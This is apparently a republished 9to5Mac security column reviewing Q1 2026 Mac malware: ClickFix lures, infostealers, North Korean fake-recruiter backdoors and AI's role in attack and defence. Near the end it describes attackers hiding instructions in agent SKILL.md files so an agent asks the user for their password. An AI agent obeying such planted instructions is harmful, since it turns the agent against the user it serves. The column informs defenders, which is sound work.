بتوقيت بيروت - 6/1/2026 2:03:42 AM - GMT (+2 )
9to5Mac Security Bite is exclusively brought to you by Mosyle, the only Apple Unified Platform. Making Apple devices work-ready and enterprise-safe is all we do. Our unique integrated approach to management and security combines state-of-the-art Apple-specific security solutions for fully automated Hardening & Compliance, Next Generation EDR, AI-powered Zero Trust, and exclusive Privilege Management with the most powerful and modern Apple MDM on the market. The result is a totally automated Apple Unified Platform currently trusted by over 45,000 organizations to make millions of Apple devices work-ready with no effort and at an affordable cost. Request your EXTENDED TRIALtoday and understand why Mosyle is everything you need to work with Apple.
This is the first quarterly Mac threat landscape review in the Security Bite series. And the first quarter of this year was pretty quiet on the iPhone front. When it comes to the walled fortress of iOS, no news is basically good news. So, in this Q1 review, I’m going to specifically be going over the Mac malware landscape and what it looks like, and where things seem to be heading.
I’ll look back on every report I covered, every guest I had on the Security Bite Podcast, and most of the samples that crossed my desk over the past three(ish) months.
There are three major takeaways from this Q1 review. The first one being that attackers have mostly stopped trying to break into Macs and are instead getting let in…
So, ClickFix is a problem. But what is it doing exactly to lure people into infecting themselves?
The quarter continues to see fake CAPTCHAs, spoofed “Reclaim disk space on your Mac” pages, malvertised ChatGPT and Atlas browser downloads, typosquatted installers aimed at crypto wallets, and bogus setup pages for AI tools like Claude Code hosted on otherwise legitimate platforms. Threat actors even abused public Claude artifacts paired with hijacked Google Ads to push malicious instructions to the top of search results.
Huntress documented a variation called CrashFix, where a malicious extension posing as an ad blocker crashes your browser and then walks you through a fake recovery flow. The payload at the end is almost always an infostealer and often contains remnants of the once-infamous Atomic Stealer (AMOS).
At one point, Atomic Stealer was the dominant infostealer on Mac by oodles. I’ve seen reports of it once, accounting for around 80% of samples.
From my conversations with Apple researchers in Q1, the developer behind the official Atomic Stealer project is believed to have gone underground after folding its dark web site.
“They kind of disappeared, but not really. Most of the detections on VirusTotal still say it’s AMOS, and it’s been really hard to distinguish because they share so much of the same codebase. You have to look at very specific things to tell that this is attributed to this group,” macOS/iOS reverse engineer Chris Lopez told me on the Security Bite Podcast.
I asked him who exactly is falling for these attacks.
“I’ve seen a lot of developers get targeted recently, which is interesting, because that’s an entryway into much more complicated compromises. But anyone can fall victim to it if you’re not paying attention and you haven’t seen this type of threat before.”
People knock Apple a lot, for many different reasons, often deservedly so. But when it comes to macOS security, recently the company has had a decent reaction time to emerging threats.
macOS Sequoia killed the good old right-click Gatekeeper bypass in 2024. This was in response to so many Mac users installing malicious clones of apps like Slack, Notion, and other popular games and utilities that weren’t signed and notarized by Apple. I still put my head in my hands on how that was even allowed to exist for so long. I’ll spare you my rant, moving on…
The most significant security change in Q1 this year came in macOS Tahoe 26.4. Apple introduced prompt warnings that fire when you paste a suspicious command into Terminal.
It held for about two weeks before Jamf Threat Labs documented a ClickFix variant that skips Terminal entirely, using a spoofed Apple webpage and an applescript:// URL scheme to open Script Editor with a malicious script preloaded. Because the command never touches Terminal, the new warning never fires. And so goes the never-ending tug-of-war between Apple and malware authors.
In the words of Jeff Goldblum from an alternate universe, “Malware finds a way.” 🦖
Infostealers and trojans are becoming one and the sameThere’s a very interesting data point from Jamf’s 2026 Security 360 report, published last quarter, that I think reflects just how sophisticated Mac malware is becoming.
The popular Apple MDM firm found that Trojans jumped from 16.61% of detections in 2024 to 50.32% in 2025, making them the largest category of Mac malware.
Atomic Stealer alone accounted for 77% of trojan activity and roughly 78% of infostealer activity, sitting atop both charts because infostealers increasingly bolt on trojan backdoors for persistence.
This gets to the second major takeaway: the malware is becoming more sophisticated, both in its code and its functionality.
The modern stealer is now modular. Not much smashing, grabbing, and taking off is happening anymore. and more attackers want backdoors so they never have to phish you twice.
To quote Chris again, who is one of the most well-known reverse engineers, “macOS malware is getting more and more complicated. Now I often run into a sample where I open it up in Binary Ninja, and everything’s a mess, and I’m like, oh my god, I don’t want to look at this, I’ll just run it and see what happens.”
The new samples this quarter followed that mold, and most showed no antivirus detection. Jamf flagged DigitStealer, which runs mostly in memory and only on M2 or newer, and ChillyHell, a notarized backdoor that had been hiding since 2021.
Mosyle, another popular Apple MDM similar to Jamf, also detected two previously undetected malware samples and shared details with 9to5Mac.
The first, Phoenix Worm, is a Golang stager that quietly establishes a foothold and hands off to a second-stage payload. ShadeStager is the post-exploitation half, built to harvest SSH keys, AWS, Azure, and GCP credentials, Kubernetes configs, and Git and Docker auth straight off developer machines. The two aren’t connected, but together they’re a tidy example of where Mac malware is headed, one payload to get in and another to harvest credentials and cloud tokens.
Iru researchers uncovered MonetaStealer in January this year. An early-stage, AI-assisted infostealer, also undetected on VirusTotal.
And lastly, Moonlock Lab uncovered NotNullOSX, a new Go-based stealer whose developer turns out to be the original macOS Stealer author, now planning to add iCloud credential theft.
North Korea can’t get enough of macOSIf there’s a single group keeping Mac researchers busy more, it’s North Korea. Every Apple security professional I spoke with this quarter brought them up, sometimes without me asking.
One of its more interesting attack vectors works by posing as a fake recruiter, sliding into a developer’s LinkedIn DMs with a role that’s a little too good, then routing them to a “technical assessment” to prove they have what it takes to work at that company. If it’s one thing developers love, it’s a coding challenge…
“They reach out on LinkedIn and provide a very convincing, ‘Hey, if you can solve this coding challenge, we’ll give you twice as much money as you’re making now,’” Jamf Threat Labs director Jaron Bradley told me.
“Then you open that coding challenge, and when you build it, in the background there’s a build file that runs a little backdoor. Sure, you’ve completed the coding challenge, but you’ve also backdoored your system. And it’s possible that’s even your work system.”
It works because it doesn’t feel like an attack. As Bradley put it, “it feels like you’ve built a relationship with someone who’s going to offer you a job, but in reality it’s somebody that had no intention of doing so.”
The malware being used: BeaverTail, InvisibleFerret, OtterCookie, and FlexibleFerret.
According to security firm Iru, North Korean campaigns are running three separate lures right now: a ClickFix-style “your camera driver is broken” prompt during the fake video call, malicious npm packages handed over as coding challenges, and trojanized Visual Studio Code workspaces.
Some FlexibleFerret samples even showed up with a valid Apple Developer signature, allowing them to bypass XProtect protections without being flagged. And these crews don’t show up light. In a single incident response, Mandiant identified seven distinct macOS malware families all targeting a single person, and all tied to a North Korean group it tracks as UNC1069.
Figuring out who’s behind what is its own headache, and it’s getting worse. “It’s harder to distinguish whether it’s North Korean guys or Russian,” Ksenia Yamburkh, a malware research engineer at Moonlock Lab, told me.
“And pretty often China uses North Korean hackers as their puppets, so they don’t show themselves doing the attacks.” Russian crews, for their part, appear to be adopting North Korean techniques straight from published research.
Another example of how Mac malware is becoming increasingly sophisticated.
AI is accelerating both sidesIt would be hard to discuss the current macOS landscape without mentioning AI, and not of the Apple Intelligence kind. The truth is that threat actors are widely using Artificial Intelligence to build malware today.
Moysle recently came to 9to5Mac with a sample that is believed to be one of the first pieces Mac malware written in part using AI-generated code.
On the offensive side, AI in the form of LLMs is quietly rewriting the rules of detection. “A single sample looks wildly different the next day, after somebody did a blog post that it was detected,” Bradley told me. “That’s not all human. AI is speeding up that process.” And it’s not just mutation. It’s starting to run the whole operation.
“There was a report from Checkpoint about a Chinese hacker who built his own team of AI agents,” Kseniia explained. “It was a malware framework with a roadmap and sprints, plans for what features would be implemented in the next few weeks.” Her team’s reaction was probably yours too: “We were like, oh my gosh. Thankfully, we’ve already implemented AI agents in our workflows, so we keep up. But it’s a hot race.”
The agent tools themselves are turning into targets too. Researchers have raised flags about platforms like OpenClaw, where AI agents run shell commands with deep access to your machine. In at least one campaign, attackers tucked malicious instructions inside SKILL.md files so an agent would do the work and then ask the user, very politely, for their password.
And I couldn’t talk about AI without mentioning Claude Mythos, Anthropic’s highly coveted frontier model that’s insanely good at finding software vulnerabilities. It technically broke in April, just past our Q1 window, but it’s too big to skip. Unlike the company’s other models, Anthropic has no plans to release this one to the public. Instead it handed it to Project Glasswing, a consortium of more than 40 companies with Apple among them, the idea being that Mythos can find and fix flaws in critical software before attackers do.
In pre-release testing, it reportedly surfaced thousands of previously unknown zero-days across every major operating system and browser, and wrote working exploits on the first attempt in more than 83% of cases, macOS included.
Here’s why that matters for your Mac. Apple now has an in-house tool that can hunt macOS zero-days at an incredible scale, which should mean faster hardening on its end. The flip side is the timeline. Attackers can’t touch Mythos right now because Anthropic is gatekeeping it hard, but capability like this always commoditizes.
The day an open or leaked model can find macOS zero-days the way Mythos does, every social engineering trick in this piece starts to look quaint. We’re not there yet, but we will be.
Security Bite is 9to5Mac’s weekly deep dive into the world of Apple security. Each week, Arin Waichulis unpacks new threats, privacy tips and concerns, vulnerabilities, and more, shaping an ecosystem of over 2 billion devices.
Follow Arin: Twitter/X,LinkedIn, Threads
FTC: We use income earning auto affiliate links. .
إقرأ المزيد